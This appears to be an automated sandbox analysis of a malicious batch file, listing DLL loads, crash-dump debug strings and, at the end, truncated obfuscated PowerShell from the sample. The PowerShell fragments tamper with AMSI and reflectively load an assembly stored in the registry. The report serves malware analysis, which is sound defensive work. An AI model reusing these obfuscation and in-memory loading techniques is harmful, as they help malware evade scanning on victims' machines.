Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: textshaping.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: textinputframework.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntdsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: logoncli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pdh.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\dllhost.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\dllhost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exeSection loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exeSection loaded: amsi.dll
Source: C:\Windows\System32\lsass.exeSection loaded: pdh.dll
Source: C:\Windows\System32\lsass.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\dwm.exeSection loaded: pdh.dll
Source: C:\Windows\System32\dwm.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: rbx-CO2.batStatic file information: File size 5214429 > 1048576
Source: Binary string: System.Configuration.Install.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Data.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: d.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbSystem.DirectoryServices.dll source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Windows.Forms.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb` source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.ServiceProcess.pdbp}Y source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Drawing.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Core.pdb`- source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000030.00000000.2811892265.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3403906582.000002259585D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Drawing.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.pdbP< source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: mscorlib.pdbh source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Core.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Numerics.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.DirectoryServices.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.ServiceProcess.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Numerics.pdbP source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: mscorlib.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000030.00000000.2811892265.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3403906582.000002259585D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ServiceProcess.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.Install.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Xml.pdbP4 source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000030.00000000.2811717839.000002259582B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402005843.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.Install.pdbMicrosoft.PowerShell.Commands.Utility.dllH source: WER8C9.tmp.dmp.27.dr
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000030.00000000.2811892265.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3403906582.000002259585D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb@y' source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Xml.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000030.00000000.2811717839.000002259582B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402005843.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.DirectoryServices.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.CSharp.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Management.pdb`*?@_*? source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Configuration.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.Install.pdbH source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: +@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000030.00000000.2811717839.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Data.ni.pdbRSDSC source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Data.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Xml.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbcache source: svchost.exe, 00000030.00000000.2811892265.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3403906582.000002259585D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Data.pdbH source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Windows.Forms.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: 7\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000030.00000002.3402005843.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: mscorlib.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.pdbpl source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Management.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Drawing.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Management.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdbH source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Core.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.DirectoryServices.pdbx*? source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Transactions.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Transactions.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000030.00000000.2811717839.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Numerics.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Transactions.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000030.00000002.3402005843.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr

Data Obfuscation

barindex
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer($HcKZyefBJpvKrT,$DyGxdRsDFLitOyBSDtJ).Invoke(''+[Char](97)+''+'m'+''+'s'+''+'i'+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'');$IPJIfzrUhQjJlmTUH=$YOhLAkBIOfDYUh.Invoke(
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+''+[Char](101)+'ct'+[Char](101)+'d'+'D'+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+'a'+[Char](11
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+'F'+''+'T'+'W'+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+''+'r'+''+[Char](98)+''+[Char](120)+''+[Char](45)+'s'+
Obfuscated command line found
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:thuUFdhjXkHq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$yFLwIFejWheBPy,[Parameter(Position=1)][Type]$NxINIPbKxv)$yMLVqpDcpHk=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+''+[Char](101)+'ct'+[Char](101)+'d'+'D'+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+'s'+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+'e'+''+[Char](100)+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+'l'+[Char](97)+